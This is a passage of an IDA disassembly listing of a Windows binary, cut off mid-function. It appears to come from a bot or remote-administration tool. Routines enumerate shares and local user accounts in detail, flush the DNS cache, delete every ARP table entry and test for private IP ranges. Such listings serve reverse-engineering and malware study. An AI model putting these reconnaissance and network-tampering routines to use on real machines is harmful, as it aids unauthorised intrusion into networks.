; =============== S U B R O U T I N E =======================================
sub_41086A proc near ; CODE XREF: sub_40107D�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_410819
push [esp+8+arg_4]
mov esi, eax
call sub_410819
pop ecx
pop ecx
push 0
push eax
push esi
call dword_491534
pop esi
retn
sub_41086A endp
; ---------------------------------------------------------------------------
db 8 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410895 proc near ; CODE XREF: sub_4011A9�j
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_410819
xor esi, esi
mov [ebp+var_C], eax
push esi
mov [ebp+arg_C], esi
push [ebp+arg_8]
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 18h
loc_4108CE: ; CODE XREF: sub_410895+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call dword_4915A8
mov ebx, eax
cmp ebx, esi
jz short loc_410931
cmp ebx, 0EAh
jz short loc_410931
push ebx
push ebx
call sub_411235
pop ecx
push eax
lea eax, [ebp+var_210]
push offset unk_430ED4
push eax
call sub_416821
push esi
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 24h
jmp short loc_41099E
; ---------------------------------------------------------------------------
loc_410931: ; CODE XREF: sub_410895+5D�j
; sub_410895+65�j
push 1
pop edi
cmp [ebp+arg_C], edi
jb short loc_410995
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_41093F: ; CODE XREF: sub_410895+FC�j
push dword ptr [esi+10h]
call dword_491550 ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_410956
mov eax, offset aNo ; "No"
loc_410956: ; CODE XREF: sub_410895+BA�j
push eax
lea eax, [ebp+var_210]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_416821
push 1
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_41093F
xor esi, esi
loc_410995: ; CODE XREF: sub_410895+A2�j
push [ebp+var_4]
call dword_4916EC
loc_41099E: ; CODE XREF: sub_410895+9A�j
cmp ebx, 0EAh
jz loc_4108CE
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_410895 endp
; ---------------------------------------------------------------------------
db 48h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4109FE proc near ; CODE XREF: sub_40102D�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_410AA2
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_410A40
dec eax
jz short loc_410A35
dec eax
jnz short loc_410A5B
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_401271
add esp, 14h
jmp short loc_410A57
; ---------------------------------------------------------------------------
loc_410A35: ; CODE XREF: sub_4109FE+1D�j
push ebx
push edi
call sub_40105A
pop ecx
pop ecx
jmp short loc_410A57
; ---------------------------------------------------------------------------
loc_410A40: ; CODE XREF: sub_4109FE+1A�j
cmp [ebp+arg_8], edi
jz short loc_410A54
push [ebp+arg_8]
push ebx
push edi
call sub_4012BC
add esp, 0Ch
jmp short loc_410A57
; ---------------------------------------------------------------------------
loc_410A54: ; CODE XREF: sub_4109FE+45�j
push 57h
pop eax
loc_410A57: ; CODE XREF: sub_4109FE+35�j
; sub_4109FE+40�j ...
cmp eax, edi
jnz short loc_410A7B
loc_410A5B: ; CODE XREF: sub_4109FE+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_491F34
push off_43064C[eax*4]
push offset unk_430FD0
push esi
call sub_416821
add esp, 10h
jmp short loc_410AC2
; ---------------------------------------------------------------------------
loc_410A7B: ; CODE XREF: sub_4109FE+5B�j
push eax
call sub_411235
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_491F34
push off_430648[eax*4]
push offset unk_430F8C
push esi
call sub_416821
add esp, 18h
jmp short loc_410AC2
; ---------------------------------------------------------------------------
loc_410AA2: ; CODE XREF: sub_4109FE+D�j
mov eax, [ebp+arg_0]
mov esi, offset dword_491F34
lea eax, [eax+eax*2]
push off_430648[eax*4]
push offset unk_430F50
push esi
call sub_416821
add esp, 0Ch
loc_410AC2: ; CODE XREF: sub_4109FE+7B�j
; sub_4109FE+A2�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4109FE endp
; ---------------------------------------------------------------------------
db 32h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410AFB proc near ; CODE XREF: sub_4012BC�j
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_410819
push [ebp+arg_4]
mov edi, eax
call sub_410819
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_410819
add esp, 0Ch
mov [ebp+var_20], eax
and [ebp+var_14], 0
and [ebp+var_10], 0
push 1
and [ebp+var_8], 0
pop eax
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_24]
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_491540
pop edi
leave
retn
sub_410AFB endp
; ---------------------------------------------------------------------------
db 16h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_410B6B proc near ; CODE XREF: sub_40105A�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_410819
push [esp+8+arg_4]
mov esi, eax
call sub_410819
pop ecx
pop ecx
push eax
push esi
call dword_491530
pop esi
retn
sub_410B6B endp
; ---------------------------------------------------------------------------
db 8 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410B94 proc near ; CODE XREF: sub_401271�j
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_410819
push [ebp+arg_4]
mov esi, eax
call sub_410819
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_4916B4
test eax, eax
mov [ebp+arg_0], eax
jnz loc_410F21
mov eax, [ebp+var_4]
test eax, eax
jz loc_410F5C
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_204]
push offset aAccountS ; "Account: %S"
push eax
call sub_416821
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_204]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_204]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_204]
push offset aCommentS ; "Comment: %S"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
add esp, 40h
mov eax, [eax+10h]
sub eax, 0
jz short loc_410CAD
dec eax
jz short loc_410CA6
dec eax
jz short loc_410C9F
mov eax, offset aUnknown ; "Unknown"
jmp short loc_410CB2
; ---------------------------------------------------------------------------
loc_410C9F: ; CODE XREF: sub_410B94+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_410CB2
; ---------------------------------------------------------------------------
loc_410CA6: ; CODE XREF: sub_410B94+FF�j
mov eax, offset aUser_2 ; "User"
jmp short loc_410CB2
; ---------------------------------------------------------------------------
loc_410CAD: ; CODE XREF: sub_410B94+FC�j
mov eax, offset aGuest ; "Guest"
loc_410CB2: ; CODE XREF: sub_410B94+109�j
; sub_410B94+110�j ...
push eax
lea eax, [ebp+var_204]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_204]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_204]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_204]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_204]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_204]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_204]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_204]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_204]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_204]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_204]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_204]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_204]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_204]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_204]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_416821
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_4010D2
add esp, 20h
pop edi
pop ebx
jmp short loc_410F4D
; ---------------------------------------------------------------------------
loc_410F21: ; CODE XREF: sub_410B94+35�j
push eax
lea eax, [ebp+var_204]
push offset unk_431000
push eax
call sub_416821
push 0
lea eax, [ebp+var_204]
push [ebp+arg_10]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4010D2
add esp, 20h
loc_410F4D: ; CODE XREF: sub_410B94+38B�j
cmp [ebp+var_4], 0
jz short loc_410F5C
push [ebp+var_4]
call dword_4916EC
loc_410F5C: ; CODE XREF: sub_410B94+40�j
; sub_410B94+3BD�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_410B94 endp
; ---------------------------------------------------------------------------
db 0F3h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411055 proc near ; CODE XREF: sub_4011FE�j
var_218 = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_410819
push esi
mov [ebp+var_14], eax
push [ebp+arg_8]
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 18h
loc_411094: ; CODE XREF: sub_411055+135�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call dword_4915C4
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_4110F5
cmp eax, 0EAh
jz short loc_4110F5
push eax
push eax
call sub_411235
pop ecx
push eax
lea eax, [ebp+var_218]
push offset unk_431228
push eax
call sub_416821
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 24h
jmp short loc_411170
; ---------------------------------------------------------------------------
loc_4110F5: ; CODE XREF: sub_411055+62�j
; sub_411055+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz loc_411183
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_411170
loc_411107: ; CODE XREF: sub_411055+ED�j
cmp edi, esi
jz short loc_411146
push dword ptr [edi]
lea eax, [ebp+var_218]
push offset aS_3 ; " %S"
push eax
call sub_416821
push 1
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_411107
jmp short loc_411170
; ---------------------------------------------------------------------------
loc_411146: ; CODE XREF: sub_411055+B4�j
lea eax, [ebp+var_218]
push offset unk_4311E0
push eax
call sub_416821
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 1Ch
loc_411170: ; CODE XREF: sub_411055+9E�j
; sub_411055+B0�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_411183
push edi
call dword_4916EC
xor edi, edi
mov [ebp+var_4], edi
loc_411183: ; CODE XREF: sub_411055+A5�j
; sub_411055+120�j
cmp [ebp+var_C], 0EAh
jz loc_411094
cmp edi, esi
jz short loc_41119B
push edi
call dword_4916EC
loc_41119B: ; CODE XREF: sub_411055+13D�j
push [ebp+var_8]
lea eax, [ebp+var_218]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_416821
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_411055 endp
; ---------------------------------------------------------------------------
db 60h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_411235 proc near ; CODE XREF: sub_410626+41�p
; sub_410895+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_4112E7
jz loc_4112E0
cmp eax, 7Bh
ja short loc_4112AC
jz short loc_4112A2
cmp eax, 5
jz short loc_411298
cmp eax, 8
jz short loc_41128E
cmp eax, 32h
jz short loc_411284
cmp eax, 35h
jz short loc_41127A
cmp eax, 57h
jnz loc_411336
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_411357
; ---------------------------------------------------------------------------
loc_41127A: ; CODE XREF: sub_411235+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_411357
; ---------------------------------------------------------------------------
loc_411284: ; CODE XREF: sub_411235+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_411357
; ---------------------------------------------------------------------------
loc_41128E: ; CODE XREF: sub_411235+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_411357
; ---------------------------------------------------------------------------
loc_411298: ; CODE XREF: sub_411235+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_411357
; ---------------------------------------------------------------------------
loc_4112A2: ; CODE XREF: sub_411235+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_411357
; ---------------------------------------------------------------------------
loc_4112AC: ; CODE XREF: sub_411235+1A�j
sub eax, 7Ch
jz short loc_4112D9
sub eax, 7C8h
jz short loc_4112D2
dec eax
jz short loc_4112C8
dec eax
jnz short loc_411336
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_411357
; ---------------------------------------------------------------------------
loc_4112C8: ; CODE XREF: sub_411235+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_411357
; ---------------------------------------------------------------------------
loc_4112D2: ; CODE XREF: sub_411235+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_411357
; ---------------------------------------------------------------------------
loc_4112D9: ; CODE XREF: sub_411235+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_411357
; ---------------------------------------------------------------------------
loc_4112E0: ; CODE XREF: sub_411235+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_411357
; ---------------------------------------------------------------------------
loc_4112E7: ; CODE XREF: sub_411235+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_411320
jz short loc_411319
sub eax, 8ADh
jz short loc_41134B
dec eax
dec eax
jz short loc_411312
dec eax
jz short loc_41130B
dec eax
dec eax
jnz short loc_411336
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_411357
; ---------------------------------------------------------------------------
loc_41130B: ; CODE XREF: sub_411235+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_411357
; ---------------------------------------------------------------------------
loc_411312: ; CODE XREF: sub_411235+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_411357
; ---------------------------------------------------------------------------
loc_411319: ; CODE XREF: sub_411235+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_411357
; ---------------------------------------------------------------------------
loc_411320: ; CODE XREF: sub_411235+B9�j
sub eax, 8CAh
jz short loc_411352
sub eax, 17h
jz short loc_41134B
sub eax, 25h
jz short loc_411344
sub eax, 29h
jz short loc_41133D
loc_411336: ; CODE XREF: sub_411235+35�j
; sub_411235+87�j ...
push offset aAnUnknownErr_0 ; "An unknown error occurred."
jmp short loc_411357
; ---------------------------------------------------------------------------
loc_41133D: ; CODE XREF: sub_411235+FF�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_411357
; ---------------------------------------------------------------------------
loc_411344: ; CODE XREF: sub_411235+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_411357
; ---------------------------------------------------------------------------
loc_41134B: ; CODE XREF: sub_411235+C2�j
; sub_411235+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_411357
; ---------------------------------------------------------------------------
loc_411352: ; CODE XREF: sub_411235+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_411357: ; CODE XREF: sub_411235+40�j
; sub_411235+4A�j ...
push offset dword_491CD4
call sub_416821
pop ecx
mov eax, offset dword_491CD4
pop ecx
retn
sub_411235 endp
; ---------------------------------------------------------------------------
db 4Dh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4113B6 proc near ; CODE XREF: sub_40127B�j
var_718 = byte ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_718]
push eax
call sub_417D0C
add esp, 0Ch
lea eax, [ebp+arg_0]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+arg_0], esi
call ds:dword_4953F0 ; GetComputerNameA
lea eax, [ebp+var_108]
push esi
push eax
lea eax, [ebp+var_318]
push eax
call sub_417D0C
lea eax, [ebp+var_718]
push eax
call sub_417CEF
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call dword_49166C
test eax, eax
jnz short loc_411446
mov esi, offset dword_491AD0
push offset unk_431604
push esi
call sub_416821
pop ecx
pop ecx
jmp short loc_41146F
; ---------------------------------------------------------------------------
loc_411446: ; CODE XREF: sub_4113B6+7A�j
lea ecx, [ebp+var_718]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_411235
pop ecx
mov esi, offset dword_491AD0
push eax
push offset unk_4315C4
push esi
call sub_416821
add esp, 14h
loc_41146F: ; CODE XREF: sub_4113B6+8E�j
mov eax, esi
pop esi
leave
retn
sub_4113B6 endp
; ---------------------------------------------------------------------------
db 2Fh dup(0CCh)
; ---------------------------------------------------------------------------
loc_4114A3: ; CODE XREF: .text:0040111D�j
push ebp
mov ebp, esp
sub esp, 20h
cmp dword ptr [ebp+8], 0
push esi
push edi
jz loc_411535
push offset byte_4370BC
push dword ptr [ebp+8]
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_411535
push 20h
lea eax, [ebp-20h]
push dword ptr [ebp+8]
push eax
call sub_416A10
mov esi, offset a__0 ; "."
lea eax, [ebp-20h]
push esi
push eax
call sub_4176C0
add esp, 14h
test eax, eax
jz short loc_411535
push eax
call sub_416CCF
push esi
push 0
mov edi, eax
call sub_4176C0
add esp, 0Ch
test eax, eax
jz short loc_411535
push eax
call sub_416CCF
cmp edi, 0Ah
pop ecx
jz short loc_411530
cmp edi, 0ACh
jnz short loc_411521
cmp eax, 0Fh
jle short loc_411535
cmp eax, 20h
jl short loc_411530
loc_411521: ; CODE XREF: .text:00411515�j
cmp edi, 0C0h
jnz short loc_411535
cmp eax, 0A8h
jnz short loc_411535
loc_411530: ; CODE XREF: .text:0041150D�j
; .text:0041151F�j
push 1
pop eax
jmp short loc_411537
; ---------------------------------------------------------------------------
loc_411535: ; CODE XREF: .text:004114AF�j
; .text:004114C6�j ...
xor eax, eax
loc_411537: ; CODE XREF: .text:00411533�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
db 26h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_411561 proc near ; CODE XREF: sub_4011C2�j
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_49169C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_411589
push [esp+arg_0]
call dword_4916E0 ; gethostbyname
test eax, eax
jnz short loc_411582
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_411582: ; CODE XREF: sub_411561+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_411589: ; CODE XREF: sub_411561+D�j
retn
sub_411561 endp
; ---------------------------------------------------------------------------
db 0Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_411594 proc near ; CODE XREF: sub_4010CD�j
mov ecx, dword_491584
xor eax, eax
test ecx, ecx
jz short locret_4115A2
call ecx ; DnsFlushResolverCache
locret_4115A2: ; CODE XREF: sub_411594+A�j
retn
sub_411594 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4115A6 proc near ; CODE XREF: sub_40101E�j
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call dword_4916D8 ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz loc_41166C
sub ecx, 32h
jz loc_411665
sub ecx, 48h
jz short loc_411606
sub ecx, 6Eh
jz short loc_4115FF
loc_4115E8: ; CODE XREF: sub_4115A6+8B�j
push eax
lea eax, [ebp+var_88]
push offset dword_431704
push eax
call sub_416821
add esp, 0Ch
jmp short loc_411646
; ---------------------------------------------------------------------------
loc_4115FF: ; CODE XREF: sub_4115A6+40�j
push offset dword_4316CC
jmp short loc_411638
; ---------------------------------------------------------------------------
loc_411606: ; CODE XREF: sub_4115A6+3B�j
push [ebp+var_8]
call sub_415CF8
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_415CA0
add esp, 10h
cmp esi, edi
jz short loc_411633
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call dword_4916D8 ; GetIpNetTable
cmp eax, edi
jz short loc_41166C
jmp short loc_4115E8
; ---------------------------------------------------------------------------
loc_411633: ; CODE XREF: sub_4115A6+79�j
push offset dword_431684
loc_411638: ; CODE XREF: sub_4115A6+5E�j
; sub_4115A6+C4�j
lea eax, [ebp+var_88]
push eax
call sub_416821
pop ecx
pop ecx
loc_411646: ; CODE XREF: sub_4115A6+57�j
lea eax, [ebp+var_88]
mov [ebp+var_4], edi
push eax
call sub_401014
pop ecx
loc_411656: ; CODE XREF: sub_4115A6+C8�j
; sub_4115A6+DC�j
push esi
call sub_415D6C
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_411665: ; CODE XREF: sub_4115A6+32�j
push offset dword_431640
jmp short loc_411638
; ---------------------------------------------------------------------------
loc_41166C: ; CODE XREF: sub_4115A6+29�j
; sub_4115A6+89�j
cmp [esi], edi
jbe short loc_411656
lea ebx, [esi+4]
loc_411673: ; CODE XREF: sub_4115A6+DA�j
push ebx
call dword_4916D4 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_411673
jmp short loc_411656
sub_4115A6 endp
; ---------------------------------------------------------------------------
db 37h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4116BB proc near ; CODE XREF: sub_401299�j
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax
lea eax, [ebp+var_14]
push 0
push eax
call sub_415CA0
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call dword_491600 ; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset dword_4924F8
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi
call sub_416821
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_4116BB endp
; ---------------------------------------------------------------------------
db 16h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_41172A proc near ; CODE XREF: sub_40120D�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
cmp esi, 1
jle short loc_411753
mov ecx, esi
push edi
shr ecx, 1
mov edx, ecx
neg edx
lea esi, [esi+edx*2]
mov edx, [esp+8+arg_0]
